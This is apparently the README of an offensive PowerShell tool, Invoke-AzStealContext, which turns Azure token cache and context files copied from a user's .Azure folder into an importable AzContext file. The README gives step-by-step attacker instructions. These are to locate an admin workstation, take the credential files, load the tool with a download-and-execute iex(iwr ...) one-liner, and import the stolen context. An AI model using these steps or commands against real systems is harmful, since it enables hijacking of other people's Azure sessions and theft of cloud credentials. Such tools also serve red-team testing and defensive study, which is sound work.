A PowerShell function that automates the process of stealing the Azure context of a users .Azure folder.
When a user uses the Az PowerShell module a .Azure folder is created in the users home folder. This folder contains multiple files including the AzureRmContext.json and TokenCache.dat files. If a user has authenticated using the Connect-AzAccount cmdlet these files contain all the information a attacker needs to create a 'AzContext' file which is equivalent of the output from the Save-AzContext cmdlet. This PowerShell function automates the process a attacker would need to take to create a 'AzContext' file.
The AzureRmContext file can have multiple 'contexts'. This happens when the Connect-AzAccount is run multiple times by the same user with different Azure credentials. This function will verify if there are multiple contexts and if so, will ask you which one to use as the default context.
- Find a Admin workstation / Userprofile that has the
.Azurefolder. - 'Borrow' the
TokenCache.datandAzureRmContext.jsonfiles. - Load this function.
iex((iwr https://raw.githubusercontent.com/justin-p/AzStealContext/master/Invoke-AzStealContext.ps1).content) - Run the function
- To prepare a AzContext file:
Invoke-AzStealContext -Path 'Path\To\Borrowed\Files' - To prepare and Import a AzContext file:
Invoke-AzStealContext -Path 'Path\To\Borrowed\Files' -ImportContext - To prepare a AzContext file and overwrite a existing OutFile:
Invoke-AzStealContext -Path 'Path\To\Borrowed\Files' -ImportContext -Force - To change the default OutFile name:
Invoke-AzStealContext -Path 'Path\To\Borrowed\Files' -OutFile 'CustomFilename.json'
- To prepare a AzContext file:
Feel free to open issues, contribute and submit your Pull Requests. You can also ping me on Twitter (@JustinPerdok)